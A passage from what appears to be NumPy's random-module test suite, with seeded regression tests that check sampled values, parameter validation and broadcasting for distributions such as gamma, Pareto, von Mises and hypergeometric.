desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10, 5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check the default size; this used to raise a deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning when check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises a ValueError when check_valid='raise'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
np.random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
__index__ = __int__
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
np.random.seed(self.seed)
assert_equal(np.random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.setSeed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = np.random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
